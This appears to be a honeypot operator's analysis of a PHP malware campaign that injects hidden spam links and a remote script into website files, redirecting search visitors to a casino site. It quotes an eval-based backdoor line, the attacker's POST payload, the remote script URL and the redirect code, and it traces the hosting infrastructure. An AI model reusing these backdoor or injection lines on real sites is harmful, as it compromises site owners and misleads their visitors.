Malware that injects HTML links into HTML or program source code that contains HTML (PHP, ASP, JSP, etc).
The HTML appears to be part of a link spamming SEO campaign to direct web traffice to a Chinese casino in Macau.
I caught a second download slightly different than this 12 days later. There's active development of this campaign going on.
202.178.125.156 does not have a reverse lookup hostname.
202.178.125.156 appears to belong to a Cambodian ISP:
irt: IRT-ANGKORNET-KH
address: #95, 3rd floor, Preah Norodom Blvd., Sangkat Boeung
address: Raing, Khan Daun Penh, Phnom Penh, Cambodia
route: 202.178.125.0/24
descr: AngkorNet-IP-Address
origin: AS24478
Download via HTTP POST, parameters named "z0" and "svmdO",
to URI /phparasites/wp-content/themes/twentytwelve/footer.php.
The attacker apparently assumed a simple PHP backdoor,
because the POST parameters have values like this:
[svmdO] => @eval(base64_decode($_POST[z0]));
[z0] => QGVycm9yX3Jlc...
The simple PHP backdoor probably consisted of a line of PHP in
footer.php that looks more-or-less like this:
<?php if (isset($_REQUEST['svmdo']) { @eval($_REQUEST['svmd0']); } ?>
My honey pot seems attemtps to install this kind of code on a daily basis. The attackers try a variety of well-known PHP files for WordPress, like the footer file above. Headers and Akismet files are also common choices.
- Rework captured information in
202.178.125.156W5cAr0-BlyMDNUfDBtpLTwAAAAE.wso.scansintodc1.php. Change "eval" to "print" - Invoke
php dc1.php > dc2.phpto print out what would get eval'ed. - Pretty print
dc2.phpto getf1.php. Change instance of "eval" to "print" - Invoke
php f1.php > dc3.phpto print out what would get eval'ed. - File
dc3.phpcontains what was probably original source. Pretty print it to yieldf2.phpfor readability.
This malware consists of 3 parts:
- The simple backdoor mentioned above in Download section.
- The inject, the PHP the backdor evals.
- The injected JavaScript and HTML.
The simple backdoor exists, but its actual form has to remain a matter of conjecture.
The injector source code finds a directory by doing $rootPath = realpath(dirname(__FILE__) . '/../../../../');
The attacker actuall invoked http://stratigery.com/phparasites/wp-content/themes/twentytwelve/footer.php.
It may constitute a coincidence, but the '/../../../../' part of $rootPath
would be Apache web server's DocumentRoot directory.
If this isn't coincidence, it means that injector source code gets
composed individually for each URL that the attacker accesses.
This isn't out of the question.
Injector source contains URL of the web site attacked,
a PHP variable for the injected JavaScript/HTML,
and other configuration variables.
Injector code starts at some "root" directory, and performs a recursive search of directories for files named according to a regular expression. It skips file names "." and "..". In Linux, these are hard links to the current directory and the parent directory. Whoever wrote it did at least rudimentary testing.
The method of obfuscation loses the original formatting. We can only examine variable and function names, and programming techniques.
The injector consists of 3 functions, RegexReplace(), str_replace_once(), LinkReplace(),
driven by code that does overall organization and sequencing.
The code is reasonably well organized by function: common pieces
of code are abstracted into their own functions.
The mix of naming conventions might indicate two authors,
or a single author without a distinct coding style
who works by modifying existing code.
The author of the functions liked PHP examples
from official PHP on-line documentation:
the format arguments to the functions are named exactly as in the official documentation.
function str_replace_once() $pos = strpos($haystack, $needle);
Whoever wrote the injector code did not have a mastery of
PHP regular expression functions.
Although the authors used preg_match() to pick out file names
in which to inject JavaScript and HTML,
they used a lot of repetitive calls to str_* functions where another preg_* function could have worked.
The injector looks for regular files that have names starting
with one of the strings
"index", "default", "home", "foot", "head"
and having a substring of ".htm", ".asp", ".php", ".jsp", or ".cfm".
Looks like this would find files named foot.html as well as footer.htm,
Java Server Pages, ColdFusion and Active Server Pages files.
The regular expression and substring choices are pretty clever,
in terms of passing a lot of differently-named, yet probably appropriate,
files for code injection.
Successful run of program gives back output like this:
__success__http://stratigery.com/index.php<br />__success__
Clearly an automatically parseable indication of what file had a batch of hyperlinks injected.
Just to see if I read the source code succesfully, I defanged the malware, wrote a small sacrifical program, and ran the defanged malware.
PHP before injection, and after injection.
function RegexReplace() has an argument $replacetype1 that
causes the injector code to place the injected HTML and JavaScript
in slightly different places.
The injector inserts a single, long line of HTML.
The HTML consists of a <span class="mylinkcode" style="display:none"> tag.
Browsers wouldn't even display the text in that span,
but it would appear in the web page's source code.
The injected HTML contains some text in the form of HTML entities,
and a <script> tag that would cause a browser or a JavaScript-aware HTML parser
to retrieve the contents of http://www.88885333.com/1.js and execute it.
It also contains 76 hyperlinks, referencing 76 unique domain names.
This JavaScript checks the referrer of the web page it executes from. If the referrer has a substring that relates to just about any search engine (special emphasis on Chinese search engines) the JavaScript sets:
self.location = 'http://www.p99.cool/';
window.adworkergo = 'cc';
That is, if a human's starts from some search engine's results page, clicks a link for an
injected web page, the browser gets redirected to http://www.p99.cool/.
This looks like some kind of link spamming SEO. Web pages with the injected HTML invisibly link to spammed web sites, possibly increasing the page rank of any of the linked-to websites with respect to the key words in the hyperlinked, invisible, text. When someone clicks a result in a serach engien's results page, their browser first retrieves the web page with injected HTML and JavaScript. THe JavaScript redirects the browser to www.p99.cool.
By removing the "display:non:" attribute in my injected test PHP file, I see this:
Running it through Google Translate gives me this:
These are all the nominal destinations of the invisible links:
The IP addresses matching the DNS names are only from a few ISPs:
| AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name |
|---|---|---|---|---|---|---|
| 54600 | 107.148.104.203 | 107.148.0.0/15 | US | arin | 2013-11-08 | PEGTECHINC - PEG TECH INC, US |
| 54600 | 108.186.50.31 | 108.186.0.0/16 | US | arin | 2013-08-02 | PEGTECHINC - PEG TECH INC, US |
| 18978 | 172.246.233.2 | 172.246.224.0/20 | US | arin | 2013-04-22 | ENZUINC-US - Enzu Inc, US |
| 132839 | 172.247.139.52 | 172.247.139.0/24 | US | arin | 2013-06-06 | POWERLINE-AS-AP POWER LINE (HK) CO., LIMITED, HK |
| 64013 | 185.224.169.205 | 185.224.169.0/24 | NL | ripencc | 2017-10-10 | PING-GLOBAL Ping Global ASN, HK |
| 45090 | 118.24.100.225 | 118.24.100.0/22 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN |
| 45090 | 118.24.125.80 | 118.24.124.0/22 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
| 45090 | 118.25.230.102 | 118.25.224.0/20 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
| 45090 | 132.232.148.238 | 132.232.144.0/20 | CN | apnic | 1989-03-23 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
| 45090 | 132.232.71.95 | 132.232.64.0/20 | CN | apnic | 1989-03-23 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN |
- PEGTECHINC - PEG TECH INC, US
- ENZUINC-US - Enzu Inc, US
- POWERLINE-AS-AP POWER LINE (HK) CO., LIMITED, HK
- PING-GLOBAL Ping Global ASN, HK
- CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN
The URL from which the invisible HTML references a JavaScript program: http://www.88885333.com/1.js
Domain Name: 88885333.COM
Registry Domain ID: 1960318797_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn
Updated Date: 2018-04-28T07:46:50Z
Creation Date: 2015-09-14T18:40:59Z
Registry Expiry Date: 2020-09-14T18:40:59Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
www.88885333.com has a DNS A record for 107.148.88.69.
There's no reverse lookup for 107.148.88.69.
This IP address appears to have a USA location.
A traceroute shows packets going to Hurricane Electric's San Jose core,
and 3 hops later, it's at 107.148.88.69.
whois gives the 107.148.0.0/15 network as belonging to
PEG TECH INC, which also hosts some of the IP addresses for
the spammed links.
www.p99.cool, destination of redirection
p99.cool has a DNS A record for 107.149.17.196
107.149.17.196 apparently resides in the USA, also at a PEG TECH INC data center.
My guess is that the point of the injected HTML and JavaScript is to direct traffic to www.p99.cool . Various web spiders from search engines retrieve the web pages that have the injected HTML. The text of the hyperlinks gives key words for search engines to attribute to the linked-to websites. It's within the realm of possiblity that the linked-to-websites are just part of the SEO: they get no extra traffic, except possibly from the search engines, as the links to them are invisible in humans' browsers. They may even have been set up by the SEO campaigners themselves, as a kind of dummy or shell.
When some poor soul searching for, say, "Korean ethics" or "Beautiful Girl Gallery"
clicks on a link to a web page with the injected HTML,
their browser gets redirected to www.p99.cool,
the web page for a casion in Macau.
While there is a Beautiful Girl hanging out with James Bond on the
casino's web page, students of Korean ethics will be disappointed.